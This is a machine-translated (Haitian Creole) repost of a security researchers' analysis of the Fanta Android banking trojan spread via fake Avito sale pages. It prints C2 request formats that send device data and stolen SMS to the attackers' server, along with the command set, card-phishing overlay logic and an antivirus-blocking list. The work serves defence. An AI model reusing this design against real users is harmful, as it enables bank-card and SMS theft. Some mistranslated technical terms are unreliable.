ProHoster > Blog > nouvèl sou entènèt > Leisya, Fanta: nouvo taktik nan ansyen Trojan android

Leisya, Fanta: nouvo taktik nan ansyen Trojan android

Leisya, Fanta: nouvo taktik nan ansyen Trojan android

Yon jou ou vle vann yon bagay sou Avito epi, apre ou fin afiche yon deskripsyon detaye sou pwodwi ou a (pa egzanp, yon modil RAM), w ap resevwa mesaj sa a:

Leisya, Fanta: nouvo taktik nan ansyen Trojan androidYon fwa ou ouvri lyen an, ou pral wè yon paj ki sanble inonsan ki fè w konnen, vandè a kontan ak siksè, ke yo te fè yon acha:

Leisya, Fanta: nouvo taktik nan ansyen Trojan android
Yon fwa ou klike sou bouton "Kontinye", yo pral telechaje yon fichye APK ki gen yon icon ak yon non ki enspire konfyans sou aparèy Android ou a. Ou enstale yon aplikasyon ki pou kèk rezon mande dwa AccessibilityService, Lè sa a, yon koup nan fenèt parèt epi byen vit disparèt epi... Se li.

Ou ale tcheke balans ou, men pou kèk rezon aplikasyon bank ou a mande detay kat ou ankò. Apre w fin antre done yo, yon bagay terib rive: pou kèk rezon ki toujou klè pou ou, lajan kòmanse disparèt nan kont ou. Ou ap eseye rezoud pwoblèm nan, men telefòn ou reziste: li peze "Retounen" ak "Kay" kle yo, pa fèmen epi li pa pèmèt ou aktive okenn mezi sekirite. Kòm yon rezilta, ou rete san lajan, machandiz ou yo pa te achte, ou se konfonn ak mande: sa ki te pase?

Repons lan se senp: ou te vin yon viktim nan Android Trojan Fanta a, yon manm nan fanmi an Flexnet. Ki jan sa te rive? Ann eksplike kounye a.

Otè yo: Andrey Polovinkin, espesyalis jinyò nan analiz malveyan, Ivan Pisarev, espesyalis nan analiz malveyan.

Gen kèk Statistik

Fanmi Flexnet nan android trwayen yo te vin konnen premye nan 2015. Pandan yon peryòd jistis long nan aktivite, fanmi an elaji nan plizyè subspecies: Fanta, Limebot, Lipton, elatriye. Trojan a, ansanm ak enfrastrikti ki asosye ak li, pa rete kanpe: nouvo plan distribisyon efikas yo ap devlope - nan ka nou an, paj èskrokri bon kalite ki vize a yon itilizatè-vann espesifik, ak devlopè Trojan yo swiv tandans alamòd nan. ekri viris - ajoute nouvo fonksyonalite ki fè li posib pou vòlè lajan pi efikas nan aparèy ki enfekte ak kontourne mekanis pwoteksyon.

Kanpay ki dekri nan atik sa a vize itilizatè ki soti nan Larisi; yon ti kantite aparèy ki enfekte yo te anrejistre nan Ikrèn, e menm mwens nan Kazakhstan ak Byelorisi.

Menm si Flexnet te nan tèren an Android Trojan pou plis pase 4 ane kounye a e li te etidye an detay pa anpil chèchè, li toujou nan bon fòm. Kòmanse nan janvye 2019, kantite potansyèl domaj se plis pase 35 milyon rubles - e sa a se sèlman pou kanpay nan Larisi. Nan 2015, yo te vann divès vèsyon Trojan android sa a sou fowòm anba tè, kote yo ka jwenn kòd sous Trojan a ak yon deskripsyon detaye tou. Sa vle di ke estatistik yo nan domaj nan mond lan se menm plis enpresyonan. Pa yon move endikatè pou yon vye granmoun konsa, pa vre?

Leisya, Fanta: nouvo taktik nan ansyen Trojan android

Soti nan vant nan desepsyon

Kòm ou ka wè nan Ekran an prezante deja nan yon paj èskrokri pou sèvis entènèt la pou afiche anons Avito, li te prepare pou yon viktim espesifik. Aparamman, atakè yo sèvi ak youn nan analizeur Avito a, ki ekstrè nimewo telefòn ak non vandè a, osi byen ke deskripsyon pwodwi a. Apre yo fin elaji paj la ak prepare fichye APK a, viktim nan voye yon SMS ak non li ak yon lyen ki mennen nan yon paj èskrokri ki gen yon deskripsyon pwodwi li a ak kantite lajan an resevwa nan "sale" nan pwodwi a. Lè w klike sou bouton an, itilizatè a resevwa yon fichye APK move - Fanta.

Yon etid sou domèn shcet491[.]ru te montre ke li se delege nan serveurs DNS Hostinger yo:

  • ns1.hostinger.ru
  • ns2.hostinger.ru
  • ns3.hostinger.ru
  • ns4.hostinger.ru

Fichye zòn nan domèn gen antre ki montre adrès IP 31.220.23[.]236, 31.220.23[.]243, ak 31.220.23[.]235. Sepandan, dosye resous prensipal domèn nan (A dosye) lonje dwèt sou yon sèvè ak adrès IP 178.132.1[.]240.

Adrès IP 178.132.1[.]240 sitiye nan Netherlands e li fè pati hoster la. WorldStream. Adrès IP 31.220.23[.]235, 31.220.23[.]236 ak 31.220.23[.]243 yo sitiye nan UK a epi yo fè pati sèvè hosting pataje HOSTINGER. Itilize kòm yon achiv openprov-ru. Domèn sa yo tou rezoud nan adrès IP 178.132.1[.]240:

  • sdelka-ru[.]ru
  • tovar-av[.]ru
  • av-tovar[.]ru
  • ru-sdelka[.]ru
  • shcet382[.]ru
  • sdelka221[.]ru
  • sdelka211[.]ru
  • vyplata437[.]ru
  • viplata291[.]ru
  • perevod273[.]ru
  • perevod901[.]ru

Li ta dwe remake ke lyen nan fòma sa a te disponib nan prèske tout domèn:

http://(www.){0,1}<%domain%>/[0-9]{7}

Modèl sa a gen ladan tou yon lyen ki soti nan yon mesaj SMS. Baze sou done istorik, yo te jwenn ke yon domèn koresponn ak plizyè lyen nan modèl ki dekri pi wo a, ki endike ke yo te itilize yon domèn yo distribye Trojan a bay plizyè viktim.

Ann ale yon ti kras pi devan: Trojan a telechaje atravè yon lyen ki soti nan yon SMS sèvi ak adrès la kòm yon sèvè kontwòl. onusedseddohap[.]club. Domèn sa a te anrejistre sou 2019-03-12, epi apati 2019-04-29, aplikasyon APK te kominike avèk domèn sa a. Dapre done yo jwenn nan VirusTotal, yon total de 109 aplikasyon kominike avèk sèvè sa a. Domèn nan tèt li rezoud nan adrès IP la 217.23.14[.]27, ki chita nan Netherlands ak posede pa hoster la WorldStream. Itilize kòm yon achiv non bon mache. Domèn tou rezoud nan adrès IP sa a bad-racoon[.]club (kòmanse nan 2018-09-25) ak move-raton[.]viv (kòmanse nan 2018-10-25). Avèk domèn bad-racoon[.]club plis pase 80 fichye APK kominike avèk yo move-raton[.]viv - plis pase 100.

An jeneral, atak la pwogrese jan sa a:

Leisya, Fanta: nouvo taktik nan ansyen Trojan android

Kisa ki anba kouvèti Fanta a?

Tankou anpil lòt trwayen android, Fanta kapab li ak voye mesaj SMS, fè demann USSD, epi montre pwòp fenèt li yo sou aplikasyon yo (ki gen ladan yo bankè yo). Sepandan, asenal fonksyonalite fanmi sa a te rive: Fanta te kòmanse itilize Sèvis Aksè pou plizyè rezon: li sa ki nan notifikasyon ki soti nan lòt aplikasyon, anpeche deteksyon ak sispann ekzekisyon an nan yon Trojan sou yon aparèy ki enfekte, elatriye. Fanta travay sou tout vèsyon Android ki pa gen mwens pase 4.4. Nan atik sa a nou pral pran yon gade pi pre nan echantiyon Fanta sa a:

  • MD5: 0826bd11b2c130c4c8ac137e395ac2d4
  • SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
  • SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb

Touswit apre lansman

Touswit apre lansman, Trojan a kache icon li yo. Aplikasyon an ka travay sèlman si non aparèy ki enfekte a pa nan lis la:

  • android_x86
  • VirtualBox
  • Nexus 5X (bullhead)
  • Nexus 5 (razwa)

Chèk sa a fèt nan sèvis prensipal Trojan a - MainService. Lè yo lanse pou premye fwa, paramèt konfigirasyon aplikasyon an yo inisyalize nan valè default (fòma a pou estoke done konfigirasyon ak siyifikasyon yo pral diskite pita), epi yon nouvo aparèy ki enfekte anrejistre sou sèvè kontwòl la. Y ap voye yon demann HTTP POST ak kalite mesaj la sou sèvè a register_bot ak enfòmasyon sou aparèy ki enfekte a (vèsyon Android, IMEI, nimewo telefòn, non operatè a ak kòd peyi kote operatè a anrejistre). Adrès la sèvi kòm sèvè kontwòl la hXXp://onuseseddohap[.]club/controller.php. An repons, sèvè a voye yon mesaj ki gen jaden yo bot_id, bot_pwd, sèvè — aplikasyon an sove valè sa yo kòm paramèt sèvè CnC la. Paramèt sèvè opsyonèl si jaden an pa te resevwa: Fanta itilize adrès enskripsyon an - hXXp://onuseseddohap[.]club/controller.php. Fonksyon chanje adrès CnC la ka itilize pou rezoud de pwoblèm: pou distribye chay la respire ant plizyè serveurs (si gen yon gwo kantite aparèy ki enfekte, chaj la sou yon sèvè entènèt ki pa optimize ka wo), epi tou pou itilize. yon sèvè altènatif nan ka yon echèk nan youn nan sèvè CnC yo.

Si yon erè rive pandan w ap voye demann lan, Trojan a ap repete pwosesis enskripsyon an apre 20 segonn.

Yon fwa ke aparèy la te anrejistre avèk siksè, Fanta pral montre mesaj sa a bay itilizatè a:

Leisya, Fanta: nouvo taktik nan ansyen Trojan android
Nòt enpòtan: sèvis la rele Sistèm Sekirite — non an nan sèvis la Trojan, epi apre klike sou bouton an OK Yon fenèt ap louvri ak paramèt Aksè nan aparèy ki enfekte a, kote itilizatè a dwe bay dwa Aksè pou sèvis move:

Leisya, Fanta: nouvo taktik nan ansyen Trojan android
Le pli vit ke itilizatè a vire sou Sèvis Aksè, Fanta jwenn aksè nan sa ki nan fenèt aplikasyon yo ak aksyon yo fè nan yo:

Leisya, Fanta: nouvo taktik nan ansyen Trojan android
Touswit apre li fin resevwa dwa Aksè, Trojan a mande dwa administratè ak dwa pou li notifikasyon:

Leisya, Fanta: nouvo taktik nan ansyen Trojan android
Sèvi ak AccessibilityService la, aplikasyon an simulation frappe, kidonk bay tèt li tout dwa ki nesesè yo.

Fanta kreye plizyè sikonstans baz done (ki pral dekri pita) ki nesesè pou estoke done konfigirasyon, ansanm ak enfòmasyon yo kolekte nan pwosesis la sou aparèy ki enfekte a. Pou voye enfòmasyon yo kolekte, Trojan a kreye yon travay repete ki fèt pou telechaje jaden ki soti nan baz done a epi resevwa yon lòd nan men sèvè kontwòl la. Entèval pou jwenn aksè nan CnC fikse depann sou vèsyon an android: nan ka a nan 5.1, entèval la pral 10 segonn, otreman 60 segonn.

Pou resevwa kòmandman an, Fanta fè yon demann GetTask nan sèvè jesyon an. Kòm repons, CnC ka voye youn nan kòmandman sa yo:

Ekip Deskripsyon
0 Voye mesaj SMS
1 Fè yon apèl nan telefòn oswa kòmand USSD
2 Mete ajou yon paramèt entèval
3 Mete ajou yon paramèt segman aks dèz
6 Mete ajou yon paramèt smsManager
9 Kòmanse kolekte mesaj SMS
11 Reyajiste telefòn ou nan paramèt faktori yo
12 Pèmèt/Enfim antre nan kreyasyon bwat dyalòg

Fanta kolekte notifikasyon tou nan 70 aplikasyon bankè, sistèm peman rapid ak bous elektwonik epi estoke yo nan yon baz done.

Sere paramèt konfigirasyon yo

Pou estoke paramèt konfigirasyon yo, Fanta itilize yon apwòch estanda pou platfòm android la - Preferences-fichye. Paramèt yo pral sove nan yon dosye yo te rele anviwònman. Yon deskripsyon paramèt yo sove se nan tablo ki anba a.

non Valè default Valè posib Deskripsyon
id 0 Nonb antye relatif ID bot
sèvè hXXp://onuseseddohap[.]club/ URL Kontwole adrès sèvè
pwd - Kòd Modpas sèvè
entèval 20 Nonb antye relatif Entèval tan. Endike konbyen tan travay sa yo ta dwe difere:

  • Lè w ap voye yon demann sou estati yon mesaj SMS voye
  • Resevwa yon nouvo lòd nan men sèvè jesyon an
segman aks dèz tout tout/telNumber Si jaden an egal ak fisèl la tout oswa TelNumber, Lè sa a, mesaj SMS resevwa a pral entèsepte pa aplikasyon an epi yo pa montre itilizatè a
smsManager 0 0/1 Pèmèt/enfim aplikasyon an kòm moun ki resevwa SMS defo
readDialog fo Vrè/fo Pèmèt/Enfim anrejistreman evènman an Aksè Evènman

Fanta itilize dosye a tou smsManager:

non Valè default Valè posib Deskripsyon
pckg - Kòd Non manadjè mesaj SMS yo itilize

Entèaksyon ak baz done

Pandan operasyon li, Trojan a sèvi ak de baz done. Baz done non a itilize pou estoke enfòmasyon divès kalite kolekte nan telefòn nan. Dezyèm baz done a rele fanta.db epi li itilize pou konsève paramèt ki responsab pou kreye fenèt èskrokri ki fèt pou kolekte enfòmasyon sou kat labank yo.

Trojan sèvi ak baz done а pou sere enfòmasyon kolekte epi konekte aksyon ou yo. Done yo estoke nan yon tab mòso bwa. Pou kreye yon tab, sèvi ak rechèch SQL sa a:

create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)

Baz done a gen enfòmasyon sa yo:

1. Logging demaraj aparèy ki enfekte a ak yon mesaj Telefòn nan limen!

2. Notifikasyon nan aplikasyon yo. Mesaj la pwodwi dapre modèl sa a:

(<%App Name%>)<%Title%>: <%Notification text%>

3. Done kat labank ki soti nan fòm èskrokri ki te kreye pa Trojan la. Paramèt VIEW_NAME ka youn nan bagay sa yo:

  • Aliexpress
  • Avito
  • Google Jwe
  • Divès <%App Name%>

Mesaj la konekte nan fòma sa a:

[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>

4. Mesaj SMS fèk ap rantre/sòtan nan fòma a:

([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>

5. Enfòmasyon sou pake a ki kreye bwat dyalòg la nan fòma a:

(<%Package name%>)<%Package information%>

Egzanp tab mòso bwa:

Leisya, Fanta: nouvo taktik nan ansyen Trojan android
Youn nan fonksyonalite Fanta se koleksyon enfòmasyon sou kat labank. Koleksyon done fèt atravè kreyasyon fenèt èskrokri lè w ap louvri aplikasyon pou bank yo. Trojan a kreye fennèt èskrokri a sèlman yon fwa. Enfòmasyon ke yo te montre itilizatè a fenèt la estoke nan yon tab anviwònman nan baz done a fanta.db. Pou kreye yon baz done, sèvi ak rechèch SQL sa a:

create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);

Tout jaden tab yo anviwònman pa default inisyalize a 1 (kreye yon fenèt èskrokri). Apre itilizatè a antre done yo, yo pral mete valè a 0. Egzanp jaden tab anviwònman:

  • ka_konekte — jaden an responsab pou montre fòm nan lè w ap louvri yon aplikasyon bankè
  • premye_bank - pa itilize
  • can_avito — jaden an responsab pou montre fòm nan lè w ap louvri aplikasyon Avito
  • can_ali — jaden an responsab pou montre fòm lan lè w ap louvri aplikasyon Aliexpress la
  • kapab_yon lòt — jaden an responsab pou montre fòm lan lè w ap louvri nenpòt aplikasyon nan lis la: Yula, Pandao, Drom Auto, Wallet. Kat rabè ak bonis, Aviasales, Booking, Trivago
  • ka_kat — jaden an responsab pou montre fòm nan lè w ap louvri Google Jwe

Entèaksyon ak sèvè jesyon an

Entèaksyon rezo ak sèvè jesyon an fèt atravè pwotokòl HTTP. Pou travay ak rezo a, Fanta itilize bibliyotèk popilè Retrofit la. Yo voye demann yo bay: hXXp://onuseseddohap[.]club/controller.php. Adrès sèvè a ka chanje lè w ap enskri sou sèvè a. Yo ka voye bonbon nan repons nan men sèvè a. Fanta fè demann sa yo bay sèvè a:

  • Enskripsyon bot la sou sèvè kontwòl la fèt yon fwa, sou premye lansman. Done sa yo sou aparèy ki enfekte a voye sou sèvè a:
    · Bonbon - bonbon yo te resevwa nan men sèvè a (valè defo se yon fisèl vid)
    · mòd - fisèl konstan register_bot
    · prefiks - konstan nonb antye relatif 2
    · version_sdk - se fòme dapre modèl sa a: <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
    · imei - IMEI aparèy ki enfekte a
    · peyi — kòd peyi kote operatè a anrejistre, nan fòma ISO
    · nimewo - nimewo telefòn
    · operatè - non operatè

    Yon egzanp yon demann voye bay sèvè a:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Content-Length: 144
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>

    An repons a demann lan, sèvè a dwe retounen yon objè JSON ki gen paramèt sa yo:
    · bot_id — ID aparèy ki enfekte a. Si bot_id egal a 0, Fanta pral re-egzekisyon demann lan.
    bot_pwd - modpas pou sèvè a.
    sèvè - kontwole adrès sèvè. Si ou vle paramèt. Si paramèt la pa espesifye, yo pral itilize adrès ki sove nan aplikasyon an.

    Egzanp objè JSON:

    {
    "response":[
   	 {
   		 "bot_id": <%BOT_ID%>,
   		 "bot_pwd": <%BOT_PWD%>,
   		 "server": <%SERVER%>
   	 }
    ],
    "status":"ok"
}

  • Mande pou resevwa yon lòd nan men sèvè a. Done sa yo voye sou sèvè a:
    · Bonbon — bonbon yo te resevwa nan men sèvè a
    · òf — id nan aparèy ki enfekte a ki te resevwa lè yo te voye demann lan register_bot
    · pwd - modpas pou sèvè a
    · divice_admin — jaden an detèmine si dwa administratè yo te jwenn. Si dwa administratè yo te jwenn, jaden an egal a 1sinon 0
    · Aksè nan — Sitiyasyon operasyon sèvis aksè. Si sèvis la te kòmanse, valè a se 1sinon 0
    · SMSManager — montre si Trojan a pèmèt kòm aplikasyon an default pou resevwa SMS
    · ekran — montre eta ekran an. Y ap mete valè a 1, si ekran an limen, otreman 0;

    Yon egzanp yon demann voye bay sèvè a:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>

    Tou depan de lòd la, sèvè a ka retounen yon objè JSON ak diferan paramèt:

    · Ekip Voye mesaj SMS: Paramèt yo genyen nimewo telefòn, tèks mesaj SMS la ak ID mesaj yo voye a. Idantifyan an itilize lè w ap voye yon mesaj bay sèvè a ak kalite setSmsStatus. 

    {
    "response":
    [
   	 {
   		 "mode": 0,
   		 "sms_number": <%SMS_NUMBER%>,
   		 "sms_text": <%SMS_TEXT%>,
   		 "sms_id": %SMS_ID%
   	 }
    ],
    "status":"ok"
}

    · Ekip Fè yon apèl nan telefòn oswa kòmand USSD: Nimewo telefòn oswa kòmandman an vini nan kò repons lan. 

    {
    "response":
    [
   	 {
   		 "mode": 1,
   		 "command": <%TEL_NUMBER%>
   	 }
    ],
    "status":"ok"
}

    · Ekip Chanje paramèt entèval. 

    {
    "response":
    [
   	 {
   		 "mode": 2,
   		 "interval": <%SECONDS%>
   	 }
    ],
    "status":"ok"
}

    · Ekip Chanje paramèt entèsepte. 

    {
    "response":
    [
   	 {
   		 "mode": 3,
   		 "intercept": "all"/"telNumber"/<%ANY_STRING%>
   	 }
    ],
    "status":"ok"
}

    · Ekip Chanje jaden SMSManager. 

    {
    "response":
    [
   	 {
   		 "mode": 6,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}

    · Ekip Kolekte mesaj SMS ki sòti nan yon aparèy ki enfekte.

    {
    "response":
    [
   	 {
   		 "mode": 9
   	 }
    ],
    "status":"ok"
}

    · Ekip Reyajiste telefòn ou nan paramèt faktori yo: 

    {
    "response":
    [
   	 {
   		 "mode": 11
   	 }
    ],
    "status":"ok"
}

    · Ekip Chanje paramèt ReadDialog. 

    {
    "response":
    [
   	 {
   		 "mode": 12,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}

  • Voye yon mesaj ak kalite setSmsStatus. Yo fè demann sa a apre yo fin egzekite lòd la Voye mesaj SMS. Rekèt la sanble sa a:

POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>

  • Téléchargement sa ki nan baz done. Yon ranje transmèt pou chak demann. Done sa yo voye sou sèvè a:
    · Bonbon — bonbon yo te resevwa nan men sèvè a
    · mòd - fisèl konstan setSaveInboxSms
    · òf — id nan aparèy ki enfekte a ki te resevwa lè yo te voye demann lan register_bot
    · tèks — tèks nan dosye baz done aktyèl la (jaden d soti nan tab la mòso bwa nan baz done a а)
    · nimewo — non dosye baz done aktyèl la (jaden p soti nan tab la mòso bwa nan baz done a а)
    · sms_mode — valè nonb antye relatif (jaden m soti nan tab la mòso bwa nan baz done a а)

    Rekèt la sanble sa a:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>

    Si yo voye avèk siksè nan sèvè a, ranje a pral efase nan tab la. Egzanp yon objè JSON retounen pa sèvè a:

    {
    "response":[],
    "status":"ok"
}

Entèaksyon ak AccessibilityService

AccessibilityService te aplike pou fè aparèy Android pi fasil pou itilize pou moun ki gen andikap. Nan pifò ka yo, entèraksyon fizik oblije kominike avèk yon aplikasyon. AccessibilityService pèmèt ou fè yo pwogramasyon. Fanta itilize sèvis la pou kreye fo fenèt nan aplikasyon bank yo epi anpeche itilizatè yo louvri paramèt sistèm yo ak kèk aplikasyon.

Sèvi ak fonksyonalite AccessibilityService la, Trojan kontwole chanjman nan eleman sou ekran aparèy ki enfekte a. Jan sa te dekri deja, paramèt Fanta yo genyen yon paramèt ki responsab pou operasyon anrejistreman ak bwat dyalòg - readDialog. Si yo mete paramèt sa a, yo pral ajoute enfòmasyon sou non ak deskripsyon pake ki te deklanche evènman an nan baz done a. Trojan a fè aksyon sa yo lè evènman yo deklanche:

  • Simulation peze dèyè a ak kle lakay yo nan ka sa yo:
    · si itilizatè a vle rdemare aparèy li
    · si itilizatè a vle efase aplikasyon "Avito" oswa chanje dwa aksè
    · si gen yon mansyone aplikasyon "Avito" sou paj la
    · lè w ap louvri aplikasyon Google Play Protect la
    · lè w ap louvri paj ak anviwònman AccessibilityService
    · lè bwat dyalòg Sistèm Sekirite a parèt
    · lè w ap louvri paj la ak paramèt "Desine sou lòt aplikasyon".
    · lè w ap louvri paj "Aplikasyon", "Rekiperasyon ak Reyajiste", "Reset done", "Anviwònman Reyajiste", "panèl Developer", "Espesyal. opòtinite", "Opòtinite espesyal", "Dwa espesyal"
    · si evènman an te pwodwi pa sèten aplikasyon.

    Lis aplikasyon

    • Android
    • Mèt Lite
    • Netwaye mèt
    • Netwaye Mèt pou CPU x86
    • Jesyon pèmisyon aplikasyon Meizu
    • Sekirite MIUI
    • Clean Master - Antivirus & Cache ak Garbage Cleaner
    • Kontwòl paran ak GPS: Kaspersky SafeKids
    • Kaspersky Antivirus AppLock & Web Security Beta
    • Viris Cleaner, Antivirus, Cleaner (MAX Security)
    • Mobile AntiVirus Sekirite PRO
    • Avast antivirus & pwoteksyon gratis 2019
    • Sekirite mobil MegaFon
    • Pwoteksyon AVG pou Xperia
    • Sekirite mobil
    • Malwarebytes antivirus & pwoteksyon
    • Antivirus pou Android 2019
    • Mèt Sekirite - Antivirus, VPN, AppLock, Booster
    • AVG antivirus pou manadjè sistèm tablèt Huawei
    • Samsung Aksè
    • Samsung Smart Manadjè
    • Mèt Sekirite Sosyal
    • Booster vitès
    • dr.web
    • Espas Sekirite Dr.Web
    • Dr.Web Sant Kontwòl mobil
    • Dr.Web Sekirite Espas Lavi
    • Dr.Web Sant Kontwòl mobil
    • Antivirus & mobil Sekirite Sosyal
    • Kaspersky Internet Security: Antivirus ak Pwoteksyon
    • Kaspersky Battery Life: Saver & Booster
    • Kaspersky Endpoint Security - pwoteksyon ak jesyon
    • AVG Antivirus gratis 2019 - Pwoteksyon pou android
    • Antivirus android
    • Norton Mobile Security ak Antivirus
    • Antivirus, firewall, VPN, sekirite mobil
    • Sekirite mobil: antivirus, VPN, pwoteksyon vòl
    • Antivirus pou android

  • Si yo mande pèmisyon lè w ap voye yon mesaj SMS nan yon nimewo kout, Fanta sanble klike sou kaz la Sonje chwa ak bouton voye.
  • Lè ou eseye retire dwa administratè nan Trojan a, li fèmen ekran telefòn lan.
  • Anpeche ajoute nouvo administratè.
  • Si aplikasyon an antivirus dr.web detekte yon menas, Fanta imite peze bouton an inyore.
  • Trojan a simule peze bouton an tounen ak lakay ou si evènman an te pwodwi pa aplikasyon an Swen Aparèy Samsung.
  • Fanta kreye fenèt èskrokri ak fòm pou antre enfòmasyon sou kat labank si yo te lanse yon aplikasyon ki soti nan yon lis anviwon 30 diferan sèvis entènèt. Pami yo: AliExpress, Booking, Avito, Google Play Market Component, Pandao, Drom Auto, elatriye.

    Fòm Phishing

    Fanta analize ki aplikasyon k ap kouri sou aparèy ki enfekte a. Si yo te louvri yon aplikasyon ki enterese, Trojan a montre yon fenèt èskrokri anlè tout lòt, ki se yon fòm pou antre enfòmasyon kat labank. Itilizatè a dwe antre done sa yo:

    • Nimewo kat
    • Dat ekspirasyon kat la
    • CVV
    • Non moun ki gen kat (pa pou tout bank)

    Tou depan de aplikasyon an kouri, yo pral montre diferan fenèt èskrokri. Anba a se egzanp kèk nan yo:

    AliExpress:

    Leisya, Fanta: nouvo taktik nan ansyen Trojan android
    Avito:

    Leisya, Fanta: nouvo taktik nan ansyen Trojan android
    Pou kèk lòt aplikasyon, pa egzanp. Google Play Market, Aviasales, Pandao, Booking, Trivago:
    Leisya, Fanta: nouvo taktik nan ansyen Trojan android

    Ki jan li te reyèlman

    Erezman, moun ki te resevwa mesaj SMS ki te dekri nan kòmansman atik la te tounen yon espesyalis cybersecurity. Se poutèt sa, vèsyon reyèl la, ki pa direktè a diferan de sa ki te di pi bonè: yon moun te resevwa yon SMS enteresan, apre sa li te bay ekip entèlijans Group-IB menas lachas la. Rezilta atak la se atik sa a. Ala bon sa bon, pa vre? Sepandan, se pa tout istwa yo fini avèk siksè, epi pou pa w la pa sanble yon direktè koupe ak yon pèt lajan, nan pifò ka li se ase yo konfòme yo ak règ sa yo depi lontan ki dekri:

    • pa enstale aplikasyon pou yon aparèy mobil ki gen Android OS soti nan nenpòt sous ki pa Google Play
    • Lè w ap enstale yon aplikasyon, peye atansyon espesyal sou dwa aplikasyon an mande yo
    • peye atansyon sou ekstansyon yo nan dosye telechaje yo
    • enstale Android OS mizajou regilyèman
    • pa vizite resous ki sispèk epi pa telechaje fichye yo
    • Pa klike sou lyen ou resevwa nan mesaj SMS.

Sous: www.habr.com

Add nouvo kòmantè